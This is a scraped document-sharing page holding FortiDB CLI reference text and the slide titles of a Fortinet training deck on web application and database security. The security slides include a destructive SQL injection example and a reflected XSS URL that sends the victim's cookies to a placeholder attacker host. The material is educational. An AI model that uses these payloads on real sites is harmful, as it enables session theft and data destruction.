Diagnose command display diagnostic information that helps you to troubleshoot problems. diagnose system export This FortiDB CLI allows you to export diagnostic information to an FTP server. Syntax: diagnose system export fd_log <ftp server> <user> <password> [directory] [filename] where: <ftp server> IP address or hostname of FTP server <username> User name of account that logs on to the FTP server <password> Password of account that logs on to the FTP server [directory] Location on FTP server where you want the diagnostic file to be placed [filename] Name of the zip file that contains several log files that will be put on the FTP server. If you don't specify a filename, you will get a default file called fortidb.zip. Sample command: diagnose system export fd_log <your_ftp_server> <your_ftp_username> <your_ftp_password> . myDiagnose.zip
Execute Top
The execute top command allows you to view the processes running on the FortiDB system. Syntax:execute top
To exit the display, type q. Other interactive commands are available while running top. For help on them, type h.
Execute Restart
This FortiDB CLI allows you to shutdown and restart the application server under which FortiDB is running Syntax:execute restart appserver
Execute Reboot
The execute reboot command allows you to restart the FortiDB system. This command will disconnect all sessions on the FortiDB system. Syntax:execute reboot
Execute Reset
The execute reset command allows you to reset the FortiDB system to factory defaults. This command will disconnect all sessions and restart the FortiDB system. Syntax:execute reset {admin-password | all-settings | data} where:
admin-password: Reset admin's password to default password. all-settings: Reset the all settings Data: Reset the database
Sample command: execute reset all-settings
Execute Format Disk

The execute format disk command allows you to format the hard disk on the FortiDB system. Executing this command will erase all device settings/images, VPN & Update Manager databases, and log data on the FortiDB system's hard drive. FortiDB's IP address and routing information will be preserved. Syntax: execute format disk Warning: If you use this command without executing backup all settings command, you may not be able to view assessments or reports after you archive and restore your data. When you want to archive and format disk, make sure that you execute config system backup allsettings command before archiving.
Questions
Thank you

LATAM MX Fortiweb FortiDB Training-V1.1

Caricato da

Informazioni sul documento

Descrizione originale:

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

LATAM MX Fortiweb FortiDB Training-V1.1

Caricato da

Copyright:

Formati disponibili

LATAM SE TEAM FortiWeb and FortiDB Training

Introduction to Web Applications

What are Web Applications ?

What are Web Applications ?

Web server data center

Data Center Perimeter

Front End Web Servers

Web Applications Advantages

A Standard Web Browser acts as the Application Client

Web Applications Advantages

A low cost way to Share, maintain, and distribute Information

So, what are Client / Server Applications ?

So, what are Client / Server Applications ?

Why those differences are important ?

A web application attack presents fewer obstacles and elements

Some Web Application Concepts

Some Web Application Concepts

Client side / Server Side execution Server-side

Client Side Scripting

Client Side / Application Layer

Goal: Render and present content to the user

Server Side Scripting

Server Side / Application Layer

Database / Data Layer

Goal: Store and manage access to data.

Common Web Application Problems

Output that requires encoding

Web Application Security

Are your Web Applications Secure ?

SQL Injection Attack # 1

Unauthorized Access Attempt:

SQL statement becomes:

SQL Injection Attack # 2

Database Modification Attack:

DB executes two SQL statements:

delete from table users where username like %

Cross Site Scripting

Cross Site Scripting can

Modify content of the web page

Spy on what you do Network Mapping XSS viruses

Cross Site Scripting - Reflected

http://mybank.com/ account.php?variable=><script>document.lo cation=http://www.badguy.com/cgi-bin/ cookie.cgi%20+document.cookie</script>

Follows link and the script executes

Cross Site Scripting - Persistent

Downlaod malicious code

Cross Site Request Forgery

Cross Site Request Forgery

Cross Site Request Forgery

Case Study: MySpace Samy Worm

17 hours, >1M infected

Case Study: MySpace Samy Worm

Case Study: MySpace Samy Worm

64% of 10M of security incidents had port 80 as entry points

Database Vulnerabilities and Miss Configurations

What about the Database ?

Sony -PlayStation Network customers

Common DB Vulnerabilities / Miss Configurations

Common DB Vulnerabilities / Miss Configurations

Common DB Vulnerabilities / Miss Configurations

Common DB Vulnerabilities / Miss Configurations

Common DB Vulnerabilities / Miss Configurations

High level requirements for databases

Activity monitoring/Audit of customer records and account information residing in databases